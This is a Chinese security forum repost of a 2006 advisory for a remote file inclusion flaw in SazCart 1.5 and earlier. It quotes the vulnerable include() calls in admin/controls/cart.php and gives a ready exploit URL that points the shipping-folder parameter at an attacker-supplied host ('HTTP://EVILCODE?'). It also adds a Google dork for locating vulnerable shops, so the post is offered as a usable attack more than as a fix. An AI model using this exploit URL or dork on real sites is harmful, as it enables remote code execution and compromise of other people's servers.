SazCart <= 1.5 (cart.php) Remote File Include Vulnerability

pub!1c

魔

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 3926
精华: 128
积分: 209876
阅读权限: 200
性别: 男
在线时间: 1119 小时
注册时间: 2007-10-23
最后登录: 2009-1-4

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2006-11-6 12:10 只看该作者

SazCart <= 1.5 (cart.php) Remote File Include Vulnerability

复制内容到剪贴板

代码:

sazcart v1.5 (cart.php) Remote File include

*********************---Hitamputih crew---******************************** 

* Bug Found By : IbnuSina

* vendor : [url]http://sazcart.com/site[/url]

*Risk   : High

* Greetz : *Solpot,permenhack,barbarosa,cah|gemblunkz,fung_men,setiawan,irvian,meteoroid

* and all member hitamputih crew community [url]www.kaipank.org/forum[/url]

*especially thx to [email]str0ke@milw0rm.com[/email] 

***************************************************************************

bug found on admin/controls/cart.php

include($_saz[&#39;settings&#39;][&#39;shippingfolder&#39;] . "/shipping.php");

$Shipping = new Shipping;

include($_saz[&#39;settings&#39;][&#39;taxfolder&#39;] . "/tax.php");

$Tax = new Tax;



exploit :

[url]http://sitename.com/[/url][sazcart PATH]/admin/controls/cart.php?_saz[settings][shippingfolder]=HTTP://EVILCODE?

google dork: "powered by sazcart"

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » SazCart <= 1.5 (cart.php) Remote File Include Vulnerability

SazCart &lt;= 1.5 (cart.php) Remote File Include Vulnerability

SazCart &lt;= 1.5 (cart.php) Remote File Include Vulnerability

代码:

SazCart <= 1.5 (cart.php) Remote File Include Vulnerability

SazCart <= 1.5 (cart.php) Remote File Include Vulnerability